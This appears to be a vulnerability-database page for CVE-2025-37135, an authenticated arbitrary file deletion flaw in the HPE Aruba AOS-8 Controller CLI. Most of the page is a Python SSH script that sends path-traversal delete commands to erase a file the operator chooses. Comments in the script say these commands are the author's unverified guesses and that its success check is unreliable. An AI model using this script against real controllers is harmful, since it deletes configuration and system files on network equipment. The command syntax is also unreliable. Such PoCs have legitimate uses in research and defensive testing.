Security Vulnerability Report
CVE-2025-37135 CVSS 6.5 MEDIUM

CVE-2025-37135

Published: 2025-10-14 17:15:40
Last Modified: 2025-11-12 21:12:22

Description

Arbitrary file deletion vulnerabilities have been identified in the command-line interface of an AOS-8 Controller/Mobility Conductor. Successful exploitation of these vulnerabilities could allow an authenticated remote malicious actor to delete arbitrary files within the affected system.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE (versions from 8.10.0.0 up to, but excluding, 8.10.0.19)
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE (versions from 8.12.0.0 up to, but excluding, 8.12.0.6)
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE (versions from 8.13.0.0 up to, but excluding, 8.13.1.0)
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE (versions from 10.4.0.0 up to, but excluding, 10.4.1.9)
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE (versions from 10.7.0.0 up to, but excluding, 10.7.2.1)
HPE Aruba Networking AOS-8 Controller (for the exact affected versions, refer to the HPE security bulletin hpesbnw04957en_us)
HPE Aruba Networking AOS-8 Mobility Conductor (for the exact affected versions, refer to the HPE security bulletin hpesbnw04957en_us)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-37135 - HPE AOS-8 Controller CLI Arbitrary File Deletion PoC

This PoC demonstrates the arbitrary file deletion vulnerability in the
command-line interface of AOS-8 Controller/Mobility Conductor.

Reviewer notes (defender context):
- The CLI command strings in ``AOS8Exploit.exploit_path_traversal`` are
  labelled by the author as *examples*; nothing in this listing ties them
  to the vendor advisory (hpesbnw04957en_us), so treat them as unverified.
- The page's CVSS vector is PR:H: valid high-privilege CLI credentials are
  a precondition. For detection, the observable is an authenticated SSH
  session issuing file-management commands that contain ``../`` sequences.
"""
import paramiko
import sys
import time


class AOS8Exploit:
    """Thin wrapper around a paramiko SSH session to an AOS-8 CLI.

    State is exactly the constructor arguments plus ``client``, which stays
    ``None`` until ``connect()`` builds an ``SSHClient``.
    """

    def __init__(self, host: str, port: int, username: str, password: str) -> None:
        self.host = host
        self.port = port
        self.username = username
        self.password = password
        self.client = None

    def connect(self) -> bool:
        """Establish SSH connection to AOS-8 Controller CLI

        Returns True on success and False on any exception; the exception
        is printed rather than re-raised.
        """
        try:
            self.client = paramiko.SSHClient()
            # AutoAddPolicy stores any unknown host key without verification,
            # so the operator's own session is exposed to host-key
            # substitution by an on-path party. Checking known_hosts
            # (load_system_host_keys() with the default RejectPolicy) is the
            # safe default for a tool that sends credentials.
            self.client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            self.client.connect(
                hostname=self.host,
                port=self.port,
                username=self.username,
                password=self.password,
                look_for_keys=False,  # password auth only: no key files ...
                allow_agent=False,    # ... and no ssh-agent
                timeout=10
            )
            print(f"[+] Connected to {self.host}:{self.port}")
            return True
        except Exception as e:
            # Broad catch: auth failures, name-resolution errors and
            # programming errors all collapse into one printed line + False.
            print(f"[-] Connection failed: {e}")
            return False

    def execute_cli_command(self, command: str) -> str | None:
        """Execute a command on the AOS-8 CLI

        Opens an interactive shell channel, drives it with fixed sleeps and
        single ``recv()`` calls, sends ``command`` and returns whatever the
        final ``recv()`` produced (decoded as UTF-8, undecodable bytes
        dropped). Returns None if any step raises.

        Args:
            command: one CLI line; a newline is appended before sending.
        """
        try:
            shell = self.client.invoke_shell()
            time.sleep(2)  # Wait for login prompt
            # NOTE(review): one recv(4096) after a fixed sleep is timing
            # dependent; on a slow link it may return a partial banner or
            # nothing at all.
            output = shell.recv(4096).decode('utf-8', errors='ignore')
            print(f"[*] Login prompt: {output.strip()}")
            # Send username
            # NOTE(review): SSH-level authentication already happened in
            # connect(); whether the AOS-8 shell prompts again for a
            # username and password is not established by this listing, so
            # the replies below may simply be the CLI echoing unexpected
            # input. The reply after the username is read and discarded.
            shell.send(self.username + "\n")
            time.sleep(1)
            output = shell.recv(4096).decode('utf-8', errors='ignore')
            # Send password
            shell.send(self.password + "\n")
            time.sleep(2)
            output = shell.recv(4096).decode('utf-8', errors='ignore')
            # "Authenticated" here only means recv() returned; nothing
            # inspects the reply for a success prompt.
            print(f"[+] Authenticated: {output.strip()}")
            # Enter enable mode if needed
            # (sent unconditionally; the reply is read and discarded)
            shell.send("enable\n")
            time.sleep(1)
            output = shell.recv(4096).decode('utf-8', errors='ignore')
            # Execute the malicious command with path traversal
            print(f"[*] Executing: {command}")
            shell.send(command + "\n")
            time.sleep(2)
            output = shell.recv(4096).decode('utf-8', errors='ignore')
            print(f"[+] Command output: {output.strip()}")
            # The channel is closed only on the happy path; an exception
            # above leaves it open until disconnect() closes the client.
            shell.close()
            return output
        except Exception as e:
            print(f"[-] Command execution failed: {e}")
            return None

    def exploit_path_traversal(self, target_file: str) -> bool:
        """
        Exploit path traversal in CLI to delete arbitrary files.
        Uses ../ sequences to escape the intended directory boundary.

        Tries each candidate command in order and stops at the first whose
        output is non-empty and does not contain the substring "error".

        Args:
            target_file: path fragment interpolated into each command as-is.
        Returns:
            True at the first command that passes the substring test,
            False otherwise (including when every command raised).
        """
        # Example malicious CLI commands exploiting path traversal
        # NOTE(review): these are the author's own examples; the listing
        # cites no source for them and the vendor advisory is not quoted,
        # so they may not correspond to real AOS-8 CLI syntax.
        commands = [
            f"file delete /tmp/../../{target_file}",
            f"delete /flash/../../{target_file}",
            f"file remove ../{target_file}",
            f"clear-file ../../{target_file}"
        ]
        for cmd in commands:
            print(f"\n[*] Trying command: {cmd}")
            result = self.execute_cli_command(cmd)
            # Absence of the word "error" is not evidence of deletion: an
            # "unknown command" / "invalid input" reply passes this test, as
            # does a bare echo of the command itself.
            if result and "error" not in result.lower():
                print(f"[+] Potential success with: {cmd}")
                return True
        return False

    def disconnect(self) -> None:
        """Close the SSH connection"""
        # self.client is assigned as soon as connect() builds the SSHClient,
        # even if the subsequent connect() call failed, so closing here is
        # safe on either path.
        if self.client:
            self.client.close()
            print("[*] Connection closed")


def main() -> None:
    """Parse argv, run the PoC once and print a completion line.

    Expects exactly five positional arguments: host, port, username,
    password, target_file. Exits with status 1 on a wrong argument count;
    ``int(port)`` raises ValueError on a non-numeric port.
    """
    if len(sys.argv) != 6:
        print(f"Usage: {sys.argv[0]} <host> <port> <username> <password> <target_file>")
        print(f"Example: {sys.argv[0]} 192.168.1.1 22 admin password123 /flash/config.cfg")
        sys.exit(1)
    host = sys.argv[1]
    port = int(sys.argv[2])
    username = sys.argv[3]
    # NOTE(review): the password is read from argv, so it is visible in
    # process listings and shell history on the operator's machine.
    password = sys.argv[4]
    target_file = sys.argv[5]
    print("=" * 60)
    print("CVE-2025-37135 - AOS-8 CLI Arbitrary File Deletion PoC")
    print("=" * 60)
    exploit = AOS8Exploit(host, port, username, password)
    if exploit.connect():
        exploit.exploit_path_traversal(target_file)
        exploit.disconnect()
    print("\n[*] PoC execution completed")


if __name__ == "__main__":
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-37135", "sourceIdentifier": "[email protected]", "published": "2025-10-14T17:15:40.140", "lastModified": "2025-11-12T21:12:21.630", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Arbitrary file deletion vulnerabilities have been identified in the command-line interface of an AOS-8 Controller/Mobility Conductor. Successful exploitation of these vulnerabilities could allow an authenticated remote malicious actor to delete arbitrary files within the affected system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.10.0.0", "versionEndExcluding": "8.10.0.19", "matchCriteriaId": "3D5F48C7-AD51-4641-9CBA-9DE9B516819E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.12.0.0", "versionEndExcluding": "8.12.0.6", "matchCriteriaId": "057AA8F5-FF66-44E9-8E06-D2B9E8B91AD2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.13.0.0", "versionEndExcluding": "8.13.1.0", "matchCriteriaId": "D4B066B5-D01B-43AE-B4DC-AF560D6B953C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", 
"versionStartIncluding": "10.4.0.0", "versionEndExcluding": "10.4.1.9", "matchCriteriaId": "04F61E46-8412-4B8D-BE7B-EBF61BE52C54"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.7.0.0", "versionEndExcluding": "10.7.2.1", "matchCriteriaId": "BEF8618F-C126-4F8F-951F-6D62FE8FAB22"}]}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04957en_us&docLocale=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}